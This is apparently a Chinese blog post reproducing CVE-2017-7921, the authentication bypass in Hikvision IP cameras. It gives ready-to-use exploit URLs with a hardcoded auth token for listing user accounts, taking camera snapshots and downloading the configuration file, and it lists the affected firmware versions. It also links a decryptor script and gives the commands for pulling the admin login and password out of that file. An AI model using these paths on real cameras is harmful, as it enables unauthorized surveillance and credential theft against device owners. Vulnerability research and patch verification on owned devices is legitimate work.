CVE-2017-7921漏洞复现

文章目录


漏洞描述

0x01 CVE-2017-7921漏洞复现

许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。
在这里插入图片描述
0x02 漏洞复现:

利用工具发现漏洞(CVE-2017-7921):
在这里插入图片描述
利用路径:/Security/users?auth=YWRtaW46MTEK

附:检索所有用户及其角色的列表
在这里插入图片描述利用路径:/onvif-http/snapshot?auth=YWRtaW46MTEK

附:获取相机快照而不进行身份验证
在这里插入图片描述利用路径:

/System/configurationFile?auth=YWRtaW46MTEK

附:下载摄像头配置账号密码文件

在这里插入图片描述0x03 漏洞影响版本:

HikvisionDS-2CD2xx2F-ISeries5.2.0build140721

版本至5.4.0build160530版本;

DS-2CD2xx0F-ISeries5.2.0build140721

版本至5.4.0Build160401版本;

DS-2CD2xx2FWDSeries5.3.1build150410

版本至5.4.4Build161125版本;

DS-2CD4x2xFWDSeries5.2.0build140721

版本至5.4.0Build160414版本;

DS-2CD4xx5Series5.2.0build140721

版本至5.4.0Build160421版本;

DS-2DFxSeries5.2.0build140805

版本至5.4.5Build160928版本;

DS-2CD63xxSeries5.0.9build140305

版本至5.3.5Build160106版本

解密二进制文件(configurationFile)

1、脚本下载:

脚本链接:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor

2、脚本使用方法:

依赖库:pycryptodome
依赖库安装:python -m pip install pycryptodome
因为我的电脑安装了两个版本的python,所以使用py -3
解密命令:
python decrypt_configurationFile.py configurationFile
红框中的就是后台登陆的账号密码

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值